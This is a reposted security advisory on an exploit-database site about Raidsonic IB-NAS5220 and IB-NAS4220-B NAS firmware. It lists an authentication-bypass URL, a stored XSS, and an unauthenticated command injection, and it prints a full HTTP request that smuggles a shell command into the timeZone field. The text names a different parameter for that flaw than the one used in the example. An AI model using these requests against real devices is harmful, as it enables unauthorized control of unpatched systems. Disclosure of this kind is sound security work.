0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities
Device Name: IB-NAS5220 / IB-NAS4220-B Vendor: Raidsonic ============ Vulnerable Firmware Releases: ============ Product Name IB-NAS5220 / IB-NAS4220-B Tested Firmware IB5220: 2.6.3-20100206S Tested Firmware IB4220: 2.6.3.IB.1.RS.1 Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip ============ Vulnerability Overview: ============ * Authentication Bypass: -> Access the following URL to bypass the login procedure: http://<IP>/nav.cgi?foldName=adm&localePreference=en * Stored XSS: System -> Time Settings -> NTP Server -> User Define Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication. Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. Example Exploit: POST /cgi/time/timeHandler.cgi HTTP/1.1 Host: 192.168.178.41 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.41/cgi/time/time.cgi Content-Type: application/x-www-form-urlencoded Content-Length: 186 month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-010 Twitter: @s3cur1ty_de ============ Time Line: ============ August 2012 - discovered vulnerability 27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B 28.08.2012 - vendor responded that they will not publish an update 15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220 15.10.2012 - vendor responded that they will not publish an update 12.02.2013 - public release ===================== Advisory end ===================== # 0day.today [2024-12-23] #